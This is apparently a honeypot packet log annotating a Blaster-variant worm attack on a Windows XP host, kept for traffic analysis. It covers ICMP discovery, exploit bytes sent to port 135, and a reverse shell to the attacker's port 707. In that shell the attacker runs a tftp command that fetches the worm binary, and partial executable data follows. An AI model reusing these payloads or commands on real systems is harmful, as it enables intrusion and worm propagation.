MSBLASTER.D Hacking Pattern

The source locate the honeypot by ICMP

08/19-15:03:03.827005 137.189.153.17 -> 192.168.20.2 ICMP TTL:125 TOS:0x0 ID:44941 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:25699 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:03:03.827366 192.168.20.2 -> 137.189.153.17 ICMP TTL:128 TOS:0x0 ID:1155 IpLen:20 DgmLen:92 Type:0 Code:0 ID:512 Seq:25699 ECHO REPLY ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.466648 137.189.153.17 -> 192.168.20.2 ICMP TTL:125 TOS:0x0 ID:40710 IpLen:20 DgmLen:92 Type:8 Code:0 ID:512 Seq:25699 ECHO ................................................................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.467040 192.168.20.2 -> 137.189.153.17 ICMP TTL:128 TOS:0x0 ID:89 IpLen:20 DgmLen:92 Type:0 Code:0 ID:512 Seq:25699 ECHO REPLY ................................................................ Send the exploit data via 135 port 08/19-15:17:09.489569 137.189.153.17:4766 -> 192.168.20.2:135 TCP TTL:125 TOS:0x0 ID:40716 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x672407A8 Ack: 0x7338DF4F Win: 0xFFC3 TcpLen: 20 ....................................2$X..EdI.p..t,..`^.......... p^......|^..............*M...j. .nr.....MARB.................... ... ...MEOW...................F8..............F................ ............MEOW.....................................(..d)...... ...................F...............F...............F............ ...F...............F...............F...............F....`...X... ....@... ...8...0...............P...O.. ........................ ................................................................ H.....f................F....................x...X...........p... .O...=.W....2.1..................................C......`...`... MEOW...................F;..............F....0..............J.... Poz.....................................0...x.n................. /......................F.X.................0................... ........h.......h...........................\.\.F.X.N.B.F.X.F.X. N.B.F.X.F.X.F.X.F.X............................................. ................................................................ ................................................................ ................................................................ ................................................................ ........ZJ3.f.v..4...........pa....!.id......4....A....j....j... .b....t......b.k...j?.....^..{p....T....ZHx.X.P.......ZXx..X...Z .c.n._..I...q....._...f.e..A...q.....u..m......{b........f.m.A.. ........^..........Y..........^.......f.q^....Z^...$ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.489593 137.189.153.17:4766 -> 192.168.20.2:135 TCP TTL:125 TOS:0x0 ID:40717 IpLen:20 DgmLen:284 DF ***AP*** Seq: 0x67240D5C Ack: 0x7338DF4F Win: 0xFFC3 TcpLen: 20 ......f.a.f.e.f.u.Y5.Y.`....fK..2{w.YZq.fff..................... ................................................................ ........\.C.$.\.1.2.3.4.5.6.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1...d.o. c........... ...0.-......*..........(............... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.491475 192.168.20.2:135 -> 137.189.153.17:4766 TCP TTL:128 TOS:0x0 ID:92 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x7338DF4F Ack: 0x67240E50 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Set up the remote shell back door at port 707 08/19-15:17:09.525727 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:93 IpLen:20 DgmLen:48 DF ******S* Seq: 0x7339CAE4 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.526684 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40721 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0x6725DC84 Ack: 0x7339CAE5 Win: 0xFFFF TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.527029 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:94 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x7339CAE5 Ack: 0x6725DC85 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.527562 192.168.20.2:135 -> 137.189.153.17:4766 TCP TTL:128 TOS:0x0 ID:95 IpLen:20 DgmLen:40 DF ***A***F Seq: 0x7338DF4F Ack: 0x67240E50 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.528106 137.189.153.17:4766 -> 192.168.20.2:135 TCP TTL:125 TOS:0x0 ID:40722 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x67240E50 Ack: 0x7338DF50 Win: 0xFFC3 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.528288 137.189.153.17:4766 -> 192.168.20.2:135 TCP TTL:125 TOS:0x0 ID:40723 IpLen:20 DgmLen:40 DF ***A***F Seq: 0x67240E50 Ack: 0x7338DF50 Win: 0xFFC3 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.528525 192.168.20.2:135 -> 137.189.153.17:4766 TCP TTL:128 TOS:0x0 ID:96 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x7338DF50 Ack: 0x67240E51 Win: 0xFAF0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.691181 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:97 IpLen:20 DgmLen:79 DF ***AP*** Seq: 0x7339CAE5 Ack: 0x6725DC85 Win: 0xFAF0 TcpLen: 20 Microsoft Windows XP [Version 5.1.2600] =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.816377 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40768 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DC85 Ack: 0x7339CB0C Win: 0xFFD8 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.816740 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:98 IpLen:20 DgmLen:105 DF ***AP*** Seq: 0x7339CB0C Ack: 0x6725DC85 Win: 0xFAF0 TcpLen: 20 ..(C) Copyright 1985-2001 Microsoft Corp.....C:\WINDOWS\system32 > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.817321 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40769 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0x6725DC85 Ack: 0x7339CB4D Win: 0xFF97 TcpLen: 20 dir wins\dllhost.exe.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:09.817840 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:99 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0x7339CB4D Ack: 0x6725DC9B Win: 0xFADA TcpLen: 20 dir wins\dllhost.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.016712 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40792 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DC9B Ack: 0x7339CB62 Win: 0xFF82 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.017100 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:100 IpLen:20 DgmLen:192 DF ***AP*** Seq: 0x7339CB62 Ack: 0x6725DC9B Win: 0xFADA TcpLen: 20 Volume in drive C has no label... Volume Serial Number is D08C- 3DDF.... Directory of C:\WINDOWS\system32\wins....File Not Found ....C:\WINDOWS\system32> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.018383 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40794 IpLen:20 DgmLen:64 DF ***AP*** Seq: 0x6725DC9B Ack: 0x7339CBFA Win: 0xFEEA TcpLen: 20 dir dllcache\tftpd.exe.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.018888 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:101 IpLen:20 DgmLen:64 DF ***AP*** Seq: 0x7339CBFA Ack: 0x6725DCB3 Win: 0xFAC2 TcpLen: 20 .dir dllcache\tftpd.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.216934 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40809 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DCB3 Ack: 0x7339CC12 Win: 0xFED2 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.217323 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:102 IpLen:20 DgmLen:196 DF ***AP*** Seq: 0x7339CC12 Ack: 0x6725DCB3 Win: 0xFAC2 TcpLen: 20 Volume in drive C has no label... Volume Serial Number is D08C- 3DDF.... Directory of C:\WINDOWS\system32\dllcache....File Not F ound....C:\WINDOWS\system32> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ tftp the worm program SVCHOST.EXE 08/19-15:17:10.218172 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40811 IpLen:20 DgmLen:97 DF ***AP*** Seq: 0x6725DCB3 Ack: 0x7339CCAE Win: 0xFE36 TcpLen: 20 tftp -i 137.189.153.17 get svchost.exe wins\SVCHOST.EXE.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.218745 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:103 IpLen:20 DgmLen:97 DF ***AP*** Seq: 0x7339CCAE Ack: 0x6725DCEC Win: 0xFA89 TcpLen: 20 .tftp -i 137.189.153.17 get svchost.exe wins\SVCHOST.EXE. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.346771 192.168.20.2:1032 -> 137.189.153.17:69 UDP TTL:128 TOS:0x0 ID:104 IpLen:20 DgmLen:48 Len: 20 ..svchost.exe.octet. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.356762 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40821 IpLen:20 DgmLen:544 Len: 516 ....MZ......................@................................... ............!..L.!This program cannot be run in DOS mode....$... .......r...!...!...!...!...!...!...!...!...!...!...!...!...!Rich ...!........PE..L......7.................4..........P:.......P.. ................................................................ .............;.......p.......................................... ............................8................................... .....text....3.......4.................. ..`.data........P...... .:.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.357366 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:105 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.359068 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40822 IpLen:20 DgmLen:544 Len: 516 ................@....rsrc........p.......H..............@..@%5Q8 @....4Q8K...0[.8X....4Q8b...0[.8X....5Q8o...'..7|...........WS2_ 32.dll.KERNEL32.dll.NTDLL.DLL.ADVAPI32.dll.iphlpapi.dll.MSVCRT.d ll.............................................................. ................................................................ ................................................................ ................................................................ ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.360668 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:106 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.362218 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40823 IpLen:20 DgmLen:544 Len: 516 ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.362765 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:107 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.367388 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40824 IpLen:20 DgmLen:544 Len: 516 .......w.).w...wM}.wT,.w...w.......w.L.wz..w.w.w...w.g.w7o.w.f.w x..w...w...w.S.w}..wA..w...wL..w.J.ws..wk..w.1.wtK.w...w...w.... ...xp>.x&..x.N.x.M.x...x...x...x.!.x...xu..x.z.x...xK~.x.*.x...x .<.xj..xZ>.xd>.xj>.xp..xGQ.x...x...x...x...x%K.x.&.x.......t<+.t jJ.t.U.tW+.t'..tW+.t...tZ..tK..t.2.t.T.t.:.t...t28.to0.t....fx0w .%0w....p*.wW..w.c.w.*.w.|.w...w...w.C.w.6.w...w<..w.y.w...w.u.w ...........7.................L.........7.................M...... ...7................ P.........7....................D:\nt\privat e\ne =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.368926 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:108 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.369913 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40825 IpLen:20 DgmLen:544 Len: 516 ....t\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999 22:17:18.. o writable files keyname "%s"..writable.... o Readable files ke yname "%s"..readable.... o ValidMasters keyname "%s"..masters. o ValidClients keyname "%s"..clients.These keys are shell pat terns with * and ? (see examples above):.... o StartDirectory ke yname "%s"..directory...Registry key names, all strings: HKEY_LO CAL_MACHINE %s..System\CurrentControlSet\Services\tftpd\paramete rs.. TFTPD_LOGFILE is %s....tftpd.log... TFTPD_DEFAULT_DIR i s %s =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.370380 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:109 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.371595 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40826 IpLen:20 DgmLen:544 Len: 516 ........\tftpdroot\.-?..a+..tftp....udp.Option negotiation failu re..No such user....File already exists.Unknown transfer ID.Ille gal TFTP operation..Disk full or allocation exceeded....Access v iolation....File not found..Error undefined.tsize...timeout.blks ize.Timeout.Insufficient resources..File name too long..Malforme d file name.octet...netascii....\.......^;..s;.......|$..V...... .D$.......@.....:.u...t..P...:V.u.@@FF..u.3.................5... .h.P....Yh....h......YYh....h......YYh....hT.....YYhH...h(.....Y Yh.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.373123 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:110 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.374137 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40827 IpLen:20 DgmLen:544 Len: 516 ........Yh....h......YYh....h......YYh....hh.....YYh\...h<.....Y Yj.......Yh.\..........u...8...j.......^.SUVW3.h....h.\.... a..0 .....$a.......-(a....4a........8a.. N...-,a...-0a........;..D`.. .......5..... a..WP..;.........@...UUUU..UUUU..]....9-.]....]..t .;.t.h@a..h.............u.......j..P...j.......Y_^]3.[...W..$a.. .....5D`....(a.......-4a...-8a....;.u...8.....j.Y3...`......R... ...Y.T$.J..^..tg.D$.....D$..D$....8-uQ..H...dt.It.Iu8...]....... ,...]....... .x....3.....+....................l$..J;.w........!. ..5. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.374615 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:111 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.375536 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40828 IpLen:20 DgmLen:544 Len: 516 .......S.....Yu"......S......;.Y......S..;.Y......9-.]..t!h....h ..........Y;.Y..]..u..-.]..h.`........Y.s........j..5.]....<...; .........8........U..Qj..u..u.........t...8...3..).E..j.j..u.t.h t.....h.....u..E.P..t....E.....U..QSV.5D...Wh.`....h `......`... .`....`...8`...<`...8`...E.P.....3...u4.E.3.90v#3..L8.;.t....... t.Q......E.C...;.r.P......Yh.`....p...;........`...VPPVh.)..hH`. ..5.`....x...VVVV....@...;...]..u....IVj.Vh."..Ph.]....t...;.u0. .a..3...Q.......]..h.^....a...f ..;.t.=....u.3._^[...x`..h``...| `... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.377070 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:112 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.378282 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40829 IpLen:20 DgmLen:544 Len: 516 ....x`....D...j.h....j...H.....]...SV.``..WS3...X.....]..+..]... ..v..........v.j.^..v4...x`.......@....A..v0..T...Vj..5.]....P.. ....]..Ou.S..L..._^[...........SU3.VW.l$..``...D$.Ph.f.@..$ .... .....;...^...9l$.......3..|$0....S...X....x`.....]..=x`..t...... @....A..v0..h....F0.0...]..hl...j..5.]....d.....;...*...UUUU..@. ...F0S.D$D..L....n4..?..3........$.....l$$.D$ .....D$......F..D$ 0j.P.D$ .~,P.F.P.D$ PW.D$8j.P..$8..........D$.f.F.P.......|$..tx ......=......b.....]..j..D$,.D$D.D$0.D$,j.Pj...`........7...=... ..., =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.378749 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:113 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.379814 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40830 IpLen:20 DgmLen:544 Len: 516 ...........$....D$.Pj..D$8WP..$(...........u............j..5.].. ..<............?.......3.9.$....t|f.E.P...........~H...~....t>.. .u9.if=..u....`...1/....f=..u....`...:3....$.......F.t7V...2j.j. ..$ ......`...D$`P.D$TP.2.......$....V.F......S..X....x`...F.x`. ...h.]...p..5x`....\......]..S..L...3.............6S..X....x`... F.x`....h.]...p..5x`....\......]..S..L..._^]3.[.........QSUV. `. .W.=p...V3.3.....u.h......l...V..C..}r...t*.D$.P.t$..0.....u..D$ ..h.V..L...U.t$......_^]3.[Y...j..t$......3....U..Q.E.P........4 a..Y =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.381413 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:114 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.383197 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40831 IpLen:20 DgmLen:544 Len: 516 .....E.P.......E.YHtWHt!Ht.HHtM...5@`....4.....$a.........5@`... .t.....$a......h a...5D`..........u...8.....j..........SUV.5.... W. a..W..$a.......5D`.....-8...3.;.u....5.]....0.....$a........4 a...D$...8a..;.u...,a....0a..."=4...r.=......,a..*...v..,a...0a. .W.5D`....;.u.....]...5T...;.t.P.....]....]..;.t.P.....]....]..; .t.P......Y...].._^][...V.t$.j..v...h....v........v..........N.; .u..8`.....@....A........N..H.V......Y^...U..QQS.].VW3..E.WPW.}. .E......;.....;.t...zuG.u.........Y;.t7.E.WPV.\...;.t#..zu#.u.V. .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.383751 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:115 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.387144 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40832 IpLen:20 DgmLen:544 Len: 516 .....Y;.Yt.....V......Y...}..3.E._^[.....t$... .....t%W.....3... ..+.V.....|$.............^_...U....(SV3.W.u.j.VVVj.j............ t.3..}....h ...h.......(...;.u.........h......l....E..}..}/..f.E ...f.@.f.E..E..E..E.j.PS..$.....t...8....x...tsj ........Y..tCj. 3.Y.....E..M.QP.^..F......3.PPPP..@.......t.j.WS.~..Z......F.u'. ..}.S........t.W..T.....t.V......Y3....8`...F.8`.....p..58`...._ ^[......8`..V.8`..3.;.t.W.y...9u.Q.....j.X...a..;...u._^..T$.V.8 `..."..8`..;.t..p.;t$.t.....j...X..3.^....T$.V.8`..."..8`..;.t.. p.;t =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.388682 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:116 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.389668 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40833 IpLen:20 DgmLen:544 Len: 516 ....$.t.........^....$...W...U.....SVW3.h `...u...X....E.P.k.... .uj.E.3.90vP.D0...t==....t6.M.QP.T.....t..E..@........E.j._.t0.. }.........E.t..x..E.C...;.r.......u.........Y.}..u:..u6.8`...8`. .;.t(.E....@..u..p.P.....V.......t..H..;...u.h.a..h.^...L...h `. ...L..._^[....U........'...SV.5....Wj....}.f..D...W...}..f..F... t+.}....3...H.......+....................}..9f...r.3.........H.. .....\..3.......+........................3...j..u...IP.....D...Q P.u...0......u......._^[.....D$.SUV.t$ .@ .....@(.....D$$W..?... .3. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.390132 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:117 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.391054 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40834 IpLen:20 DgmLen:544 Len: 516 ......j.........f...^..l$..}.........5\...h....U..Y..Yud........ .+.j...................^....U..`...Y;..L$..A ......=..........=. ...u..A ....+..7...j.SP.....h....U..Y..Yut.........+..........U. ................`...Y.L$.j.Z;..A(......=...........D$(.......3.. ...+..........................h....U..Y....Y.........3.......... +.....................|$....u3....3.....+..............3........ ......I...\.....>.D$.j.S.p$..d...........3.....I.\.......3.....I 8D...l..t......3.....I8D...l....@....t$$.D$ +......u.. .3._^][.. .j.V =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.392580 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:118 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.393629 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40835 IpLen:20 DgmLen:544 Len: 516 ......j.j..q..........PQ..........U..S.].VW.......]...t.<\t.</u. .A.A............<........Q..y...\......../......:........Q..y... \t.../u.N..N;.vT..<\t.</t.N;.s.F;u.v..~. .F.u.......<\t.</u.;.t. .F.<\t.</t...\FAt...<\t.</t..u..b...3....N..F...\t.../u....&.j.X _^[]......A.FA..t.<\t.</u...........x...<\..p...</..h......A.FA. .U..SV.u.W.....3..U.....I...........I.|3.\.....3..:\.....u...u.. E........e....t...t.K.E..M.....I;.v.3..6.E.G..W..RP..D....E..... ................}....t....\j.X_^[]...V.t$.W..$.....$.....t . ..D $.f. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.394105 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:119 IpLen:20 DgmLen:32 Len: 4 .... 